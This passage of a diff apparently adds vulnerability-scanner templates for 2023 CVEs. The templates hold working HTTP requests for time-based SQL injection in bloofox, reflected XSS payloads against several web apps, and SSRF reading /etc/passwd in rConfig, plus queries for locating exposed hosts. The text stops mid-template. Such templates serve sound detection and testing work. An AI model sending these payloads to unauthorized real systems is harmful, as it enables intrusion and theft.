author: theamanrawat
|
||||||
|
severity: critical
|
||||||
|
description: |
|
||||||
|
bloofox v0.5.2.1 was discovered to contain a SQL injection vulnerability via the userid parameter at admin/index.php?mode=user&action=edit.
|
||||||
|
reference:
|
||||||
|
- https://www.bloofox.com
|
||||||
|
- https://ndmcyb.hashnode.dev/bloofox-v0521-was-discovered-to-contain-many-sql-injection-vulnerability
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-34755
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 9.8
|
||||||
|
cve-id: CVE-2023-34755
|
||||||
|
cwe-id: CWE-89
|
||||||
|
metadata:
|
||||||
|
verified: "true"
|
||||||
|
fofa-query: "Powered by bloofoxCMS"
|
||||||
|
max-request: 2
|
||||||
|
tags: cve,cve2023,sqli,bloofox,authenticated
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /admin/index.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
username={{username}}&password={{password}}&action=login
|
||||||
|
|
||||||
|
- |
|
||||||
|
@timeout: 10s
|
||||||
|
POST /admin/index.php?mode=user&action=edit HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
username={{username}}&password={{password}}&pwdconfirm=test&blocked=0&deleted=0&status=0&login_page=0&userid='+AND+(SELECT+7401+FROM+(SELECT(SLEEP(6)))hwrS)--+&send=Save
|
||||||
|
|
||||||
|
cookie-reuse: true
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- duration>=6
|
||||||
|
- contains(header_2, "text/html")
|
||||||
|
- contains(body_2, 'bloofoxCMS Admincenter')
|
||||||
|
condition: and
|
|
@ -0,0 +1,50 @@
|
||||||
|
id: CVE-2023-34756
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Bloofox v0.5.2.1 - SQL Injection
|
||||||
|
author: theamanrawat
|
||||||
|
severity: critical
|
||||||
|
description: |
|
||||||
|
Bloofox v0.5.2.1 was discovered to contain a SQL injection vulnerability via the cid parameter at admin/index.php?mode=settings&page=charset&action=edit.
|
||||||
|
reference:
|
||||||
|
- https://ndmcyb.hashnode.dev/bloofox-v0521-was-discovered-to-contain-many-sql-injection-vulnerability
|
||||||
|
- https://www.bloofox.com
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-34756
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 9.8
|
||||||
|
cve-id: CVE-2023-34756
|
||||||
|
cwe-id: CWE-89
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
fofa-query: "Powered by bloofoxCMS"
|
||||||
|
max-request: 2
|
||||||
|
tags: cve,cve2023,sqli,bloofox,authenticated
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /admin/index.php HTTP/2
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
username={{username}}&password={{password}}&action=login
|
||||||
|
|
||||||
|
- |
|
||||||
|
@timeout: 10s
|
||||||
|
POST /admin/index.php?mode=settings&page=charset&action=edit HTTP/2
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
name=ISO-8859-1&description=&cid=2'+AND+(SELECT+7401+FROM+(SELECT(SLEEP(6)))hwrS)--+&send=Save
|
||||||
|
|
||||||
|
cookie-reuse: true
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- duration>=6
|
||||||
|
- status_code == 200
|
||||||
|
- contains(header, "text/html")
|
||||||
|
- contains(body_2, 'Admincenter')
|
||||||
|
condition: and
|
|
@ -0,0 +1,32 @@
|
||||||
|
id: CVE-2023-36306
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Adiscon LogAnalyzer v.4.1.13 - Cross-Site Scripting
|
||||||
|
author: r3Y3r53
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
A Cross Site Scripting (XSS) vulnerability in Adiscon Aiscon LogAnalyzer through 4.1.13 allows a remote attacker to execute arbitrary code via the asktheoracle.php
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/51643
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-36306
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.1
|
||||||
|
cve-id: CVE-2023-36306
|
||||||
|
cwe-id: CWE-79
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
tags: cve,cve2023,xss,unauth,exploitdb,adiscon,adiscon-loganalyzer
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/loganalyzer/asktheoracle.php?type=domain&query=&uid=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'status_code == 200'
|
||||||
|
- 'contains(content_type, "text/html")'
|
||||||
|
- 'contains(body, "><script>alert(document.domain)</script>") && contains(body, "Adiscon LogAnalyzer")'
|
||||||
|
condition: and
|
|
@ -0,0 +1,49 @@
|
||||||
|
id: CVE-2023-37979
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Ninja Forms < 3.6.26 - Cross-Site Scripting
|
||||||
|
author: r3Y3r53
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin
|
||||||
|
remediation: Fixed in version 3.6.26
|
||||||
|
reference:
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-37979
|
||||||
|
- https://wpscan.com/vulnerability/3c7c65e9-c4fd-4d98-ae16-77abffbf7348
|
||||||
|
- https://packetstormsecurity.com/files/173983/WordPress-Ninja-Forms-3.6.25-Cross-Site-Scripting.html
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.1
|
||||||
|
cve-id: CVE-2023-37979
|
||||||
|
cwe-id: CWE-79
|
||||||
|
cpe: cpe:2.3:a:ninjaforms:ninja_forms:*:*:*:*:*:wordpress:*:*
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
max-request: 1
|
||||||
|
publicwww-query: "/wp-content/plugins/ninja-forms/"
|
||||||
|
tags: cve,cve2023,xss,wordpress,wpscan,authenticated,wp-plugin,wp
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /wp-login.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
log={{username}}&pwd={{password}}&wp-submit=Log+In
|
||||||
|
|
||||||
|
- |
|
||||||
|
POST /wp-admin/admin-ajax.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
action=nf_batch_process&batch_type=import_form_template&extraData%5Btemplate%5D=formtemplate-contactformd&method_override=_respond&data=Mehran%7D%7D%3Cimg+src%3Donerror%3Dalert%28document.domain%29%3E
|
||||||
|
|
||||||
|
cookie-reuse: true
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'contains(content_type_2, "text/html")'
|
||||||
|
- 'contains(body_2, "<img src=onerror=alert(document.domain)>") && contains(body_2, "import_form_template")'
|
||||||
|
- 'status_code_2 == 200'
|
||||||
|
condition: and
|
|
@ -0,0 +1,31 @@
|
||||||
|
id: CVE-2023-3843
|
||||||
|
info:
|
||||||
|
name: mooDating 1.2 - Cross-site scripting
|
||||||
|
author: r3Y3r53
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
A vulnerability was found in mooSocial mooDating 1.2. It has been classified as problematic. Affected is an unknown function of the file /matchmakings/question of the component URL Handler. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. VDB-235194 is the identifier assigned to this vulnerability. NOTE: We tried to contact the vendor early about the disclosure but the official mail address was not working properly.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/51628
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-3843
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.1
|
||||||
|
cve-id: CVE-2023-3843
|
||||||
|
cwe-id: CWE-79
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
tags: cve,cve2023,xss,unauth,exploitdb,moodating
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/matchmakings/questiontmili%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.domain)%3Ew71ch?number="
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'status_code == 404'
|
||||||
|
- 'contains(content_type, "text/html")'
|
||||||
|
- 'contains(body, "><img src=a onerror=alert(document.domain)>w71ch") && contains(body, "mooDating")'
|
||||||
|
condition: and
|
|
@ -0,0 +1,32 @@
|
||||||
|
id: CVE-2023-3844
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: MooDating 1.2 - Cross-Site Scripting
|
||||||
|
author: r3Y3r53
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
A vulnerability was found in mooSocial mooDating 1.2. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /friends of the component URL Handler. The manipulation leads to cross site scripting. The attack can be launched remotely.
|
||||||
|
reference:
|
||||||
|
- https://packetstormsecurity.com/files/173691/mooDating-1.2-Cross-Site-Scripting.html
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-3844
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.1
|
||||||
|
cve-id: CVE-2023-3844
|
||||||
|
cwe-id: CWE-79
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
tags: cve,cve2023,xss,moodating
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/friendsslty3%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3er5c3m/ajax_invite?mode=model"
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'status_code == 404'
|
||||||
|
- 'contains(content_type, "text/html")'
|
||||||
|
- 'contains_all(body, "><img src=a onerror=alert(document.domain)>r5c3m", "mooDating")'
|
||||||
|
condition: and
|
|
@ -0,0 +1,32 @@
|
||||||
|
id: CVE-2023-3845
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: MooDating 1.2 - Cross-Site Scripting
|
||||||
|
author: r3Y3r53
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
A vulnerability was found in mooSocial mooDating 1.2. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /friends/ajax_invite of the component URL Handler. The manipulation leads to cross site scripting. The attack may be launched remotely.
|
||||||
|
reference:
|
||||||
|
- https://packetstormsecurity.com/files/173691/mooDating-1.2-Cross-Site-Scripting.html
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-3845
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.1
|
||||||
|
cve-id: CVE-2023-3845
|
||||||
|
cwe-id: CWE-79
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
tags: cve,cve2023,xss,moodating
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/friends/ajax_invitej7hrg%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3ef26v4?mode=model"
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'status_code == 404'
|
||||||
|
- 'contains(content_type, "text/html")'
|
||||||
|
- 'contains_all(body, "><img src=a onerror=alert(document.domain)>", "mooDating")'
|
||||||
|
condition: and
|
|
@ -0,0 +1,32 @@
|
||||||
|
id: CVE-2023-3846
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: MooDating 1.2 - Cross-Site Scripting
|
||||||
|
author: r3Y3r53
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
A vulnerability classified as problematic has been found in mooSocial mooDating 1.2. This affects an unknown part of the file /pages of the component URL Handler. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely.
|
||||||
|
reference:
|
||||||
|
- https://packetstormsecurity.com/files/173691/mooDating-1.2-Cross-Site-Scripting.html
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-3846
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.1
|
||||||
|
cve-id: CVE-2023-3846
|
||||||
|
cwe-id: CWE-79
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
tags: cve,cve2023,xss,moodating
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/pagesi3efi%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3ebdk84/no-permission-role?access_token&=redirect_url=aHR0cHM6Ly9kZW1vLm1vb2RhdGluZ3NjcmlwdC5jb20vbWVldF9tZS9pbmRleC9tZWV0X21l"
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'status_code == 404'
|
||||||
|
- 'contains(content_type, "text/html")'
|
||||||
|
- 'contains_all(body, "><img src=a onerror=alert(document.domain)>", "mooDating")'
|
||||||
|
condition: and
|
|
@ -0,0 +1,32 @@
|
||||||
|
id: CVE-2023-3847
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: MooDating 1.2 - Cross-Site scripting
|
||||||
|
author: r3Y3r53
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
A vulnerability classified as problematic was found in mooSocial mooDating 1.2. This vulnerability affects unknown code of the file /users of the component URL Handler. The manipulation leads to cross site scripting. The attack can be initiated remotely.
|
||||||
|
reference:
|
||||||
|
- https://packetstormsecurity.com/files/173691/mooDating-1.2-Cross-Site-Scripting.html
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-3847
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.1
|
||||||
|
cve-id: CVE-2023-3847
|
||||||
|
cwe-id: CWE-79
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
tags: cve,cve2023,xss,moodating
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/users/viewi1omd%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3el43yn/108?tab=activity"
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'status_code == 404'
|
||||||
|
- 'contains(content_type, "text/html")'
|
||||||
|
- 'contains_all(body, "><img src=a onerror=alert(document.domain)>","mooDating")'
|
||||||
|
condition: and
|
|
@ -0,0 +1,32 @@
|
||||||
|
id: CVE-2023-3848
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: MooDating 1.2 - Cross-site scripting
|
||||||
|
author: r3Y3r53
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
A vulnerability, which was classified as problematic, has been found in mooSocial mooDating 1.2. This issue affects some unknown processing of the file /users/view of the component URL Handler. The manipulation leads to cross site scripting. The attack may be initiated remotely.
|
||||||
|
reference:
|
||||||
|
- https://packetstormsecurity.com/files/173691/mooDating-1.2-Cross-Site-Scripting.html
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-3848
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.1
|
||||||
|
cve-id: CVE-2023-3848
|
||||||
|
cwe-id: CWE-79
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
tags: cve,cve2023,xss,moodating
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}/users/viewi1omd"><img%20src%3da%20onerror%3dalert(document.domain)>l43yn/108?tab=activity'
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'status_code == 404'
|
||||||
|
- 'contains(content_type, "text/html")'
|
||||||
|
- 'contains_all(body, "<img src=a onerror=alert(document.domain)>", "mooDating")'
|
||||||
|
condition: and
|
|
@ -0,0 +1,31 @@
|
||||||
|
id: CVE-2023-3849
|
||||||
|
info:
|
||||||
|
name: mooDating 1.2 - Cross-site scripting
|
||||||
|
author: r3Y3r53
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
A vulnerability, which was classified as problematic, was found in mooSocial mooDating 1.2. Affected is an unknown function of the file /find-a-match of the component URL Handler. The manipulation leads to cross site scripting. It is possible to launch the attack remotely.
|
||||||
|
reference:
|
||||||
|
- https://packetstormsecurity.com/files/173691/mooDating-1.2-Cross-Site-Scripting.html
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-3849
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.1
|
||||||
|
cve-id: CVE-2023-3849
|
||||||
|
cwe-id: CWE-79
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
tags: cve,cve2023,xss,unauth,moodating
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}/find-a-matchpksyk"><img%20src%3da%20onerror%3dalert(document.cookie)>s9a64?'
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'status_code == 404'
|
||||||
|
- 'contains(content_type, "text/html")'
|
||||||
|
- 'contains(body, "><img src=a onerror=alert(document.cookie)>s9a64") && contains(body, "mooDating")'
|
||||||
|
condition: and
|
|
@ -1,53 +1,35 @@
|
||||||
id: CVE-2023-38501
|
id: CVE-2023-38501
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Copyparty v1.8.6 - Cross-Site Scripting
|
name: CopyParty v1.8.6 - Cross Site Scripting
|
||||||
author: ctflearner
|
author: r3Y3r53
|
||||||
severity: medium
|
severity: medium
|
||||||
description: |
|
description: |
|
||||||
Copyparty is a portable file server. Versions prior to 1.8.6 are subject to a reflected cross-site scripting (XSS) Attack. The vulnerability in the application's web interface could allow an attacker to execute malicious javascript code by tricking users into accessing a malicious link.
|
Copyparty is a portable file server. Versions prior to 1.8.6 are subject to a reflected cross-site scripting (XSS) Attack.Vulnerability that exists in the web interface of the application could allow an attacker to execute malicious javascript code by tricking users into accessing a malicious link.
|
||||||
remediation: Upgrade to the latest version to mitigate this vulnerability.
|
remediation: Fixed in v1.8.6
|
||||||
reference:
|
reference:
|
||||||
- https://www.exploit-db.com/exploits/51635
|
- https://www.exploit-db.com/exploits/51635
|
||||||
- https://github.com/9001/copyparty/commit/007d948cb982daa05bc6619cd20ee55b7e834c38
|
- https://github.com/9001/copyparty/releases/tag/v1.8.6
|
||||||
- https://github.com/9001/copyparty/security/advisories/GHSA-f54q-j679-p9hh
|
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2023-38501
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-38501
|
||||||
- http://packetstormsecurity.com/files/173821/Copyparty-1.8.6-Cross-Site-Scripting.html
|
|
||||||
classification:
|
classification:
|
||||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
cvss-score: 6.1
|
cvss-score: 6.1
|
||||||
cve-id: CVE-2023-38501
|
cwe-id: CWE-79
|
||||||
cwe-id: CWE-79
|
|
||||||
epss-score: 0.00282
|
|
||||||
epss-percentile: 0.64883
|
|
||||||
cpe: cpe:2.3:a:copyparty_project:copyparty:*:*:*:*:*:*:*:*
|
|
||||||
metadata:
|
metadata:
|
||||||
verified: true
|
verified: true
|
||||||
max-request: 1
|
max-request: 1
|
||||||
vendor: copyparty_project
|
|
||||||
product: copyparty
|
|
||||||
shodan-query: title:"copyparty"
|
shodan-query: title:"copyparty"
|
||||||
tags: packetstorm,copyparty,cve,cve2023,xss
|
tags: cve,cve2023,copyparty,xss,oss
|
||||||
|
|
||||||
http:
|
http:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/?k304=y%0D%0A%0D%0A%3Cimg+src%3Dcopyparty+onerror%3Dalert(document.domain)%3E"
|
- "{{BaseURL}}/?k304=y%0D%0A%0D%0A%3Cimg+src%3Dcopyparty+onerror%3Dalert(document.domain)%3E"
|
||||||
|
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: dsl
|
||||||
part: body
|
dsl:
|
||||||
words:
|
- 'status_code == 200'
|
||||||
- '<img src=copyparty onerror=alert(document.domain)>'
|
- 'contains(content_type, "text/html")'
|
||||||
- 'go to /'
|
- 'contains_all(body, "<img src=copyparty onerror=alert(document.domain)>","\">go to")'
|
||||||
condition: and
|
condition: and
|
||||||
|
|
||||||
- type: word
|
|
||||||
part: header
|
|
||||||
words:
|
|
||||||
- 'text/html'
|
|
||||||
|
|
||||||
- type: status
|
|
||||||
status:
|
|
||||||
- 200
|
|
||||||
|
|
|
@ -0,0 +1,58 @@
|
||||||
|
id: CVE-2023-39108
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: rConfig 3.9.4 - Server-Side Request Forgery
|
||||||
|
author: theamanrawat
|
||||||
|
severity: high
|
||||||
|
description: |
|
||||||
|
rconfig v3.9.4 was discovered to contain a Server-Side Request Forgery (SSRF) via the path_b parameter in the doDiff Function of /classes/compareClass.php. This vulnerability allows authenticated attackers to make arbitrary requests via injection of crafted URLs.
|
||||||
|
reference:
|
||||||
|
- https://www.rconfig.com/downloads/rconfig-3.9.4.zip
|
||||||
|
- https://github.com/zer0yu/CVE_Request/blob/master/rConfig/rConfig_path_b.md
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-39108
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 8.8
|
||||||
|
cve-id: CVE-2023-39108
|
||||||
|
cwe-id: CWE-918
|
||||||
|
metadata:
|
||||||
|
max-request: 1
|
||||||
|
verified: true
|
||||||
|
shodan-query: http.title:"rConfig"
|
||||||
|
tags: cve,cve2023,rconfig,authenticated,ssrf,lfr
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /login.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
- |
|
||||||
|
POST /lib/crud/userprocess.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
user={{username}}&pass={{password}}&sublogin=1
|
||||||
|
|
||||||
|
- |
|
||||||
|
GET /lib/crud/configcompare.crud.php?path_b=file:///etc/passwd HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
cookie-reuse: true
|
||||||
|
host-redirects: true
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body_1
|
||||||
|
words:
|
||||||
|
- "rConfig"
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
part: body_3
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0:"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
part: header_3
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,57 @@
|
||||||
|
id: CVE-2023-39109
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: rConfig 3.9.4 - Server-Side Request Forgery
|
||||||
|
author: theamanrawat
|
||||||
|
severity: high
|
||||||
|
description: |
|
||||||
|
rconfig v3.9.4 was discovered to contain a Server-Side Request Forgery (SSRF) via the path_a parameter in the doDiff Function of /classes/compareClass.php. This vulnerability allows authenticated attackers to make arbitrary requests via injection of crafted URLs.
|
||||||
|
reference:
|
||||||
|
- https://www.rconfig.com/downloads/rconfig-3.9.4.zip
|
||||||
|
- https://github.com/zer0yu/CVE_Request/blob/master/rConfig/rConfig_path_a.md
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-39109
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 8.8
|
||||||
|
cve-id: CVE-2023-39109
|
||||||
|
cwe-id: CWE-918
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
shodan-query: http.title:"rConfig"
|
||||||
|
max-request: 1
|
||||||
|
tags: cve,cve2023,rconfig,authenticated,ssrf,lfi
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /login.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
- |
|
||||||
|
POST /lib/crud/userprocess.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
user={{username}}&pass={{password}}&sublogin=1
|
||||||
|
|
||||||
|
- |
|
||||||
|
GET /lib/crud/configcompare.crud.php?path_a=file:///etc/passwd HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
cookie-reuse: true
|
||||||
|
host-redirects: true
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body_1
|
||||||
|
words:
|
||||||
|
- "rConfig"
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
part: body_3
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0:"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,57 @@
|
||||||
|
id: CVE-2023-39110
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: rConfig 3.9.4 - Server-Side Request Forgery
|
||||||
|
author: theamanrawat
|
||||||
|
severity: high
|
||||||
|
description: |
|
||||||
|
rconfig v3.9.4 was discovered to contain a Server-Side Request Forgery (SSRF) via the path parameter at /ajaxGetFileByPath.php. This vulnerability allows authenticated attackers to make arbitrary requests via injection of crafted URLs.
|
||||||
|
reference:
|
||||||
|
- https://www.rconfig.com/downloads/rconfig-3.9.4.zip
|
||||||
|
- https://github.com/zer0yu/CVE_Request/blob/master/rConfig/rConfig_%20ajaxGetFileByPath.md
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-39110
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 8.8
|
||||||
|
cve-id: CVE-2023-39110
|
||||||
|
cwe-id: CWE-918
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
shodan-query: http.title:"rConfig"
|
||||||
|
tags: cve,cve2023,rconfig,authenticated,ssrf,lfr
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /login.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
- |
|
||||||
|
POST /lib/crud/userprocess.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
user={{username}}&pass={{password}}&sublogin=1
|
||||||
|
|
||||||
|
- |
|
||||||
|
GET /lib/ajaxHandlers/ajaxGetFileByPath.php?path=file://localhost/etc/passwd HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
cookie-reuse: true
|
||||||
|
host-redirects: true
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: regex
|
||||||
|
part: body_3
|
||||||
|
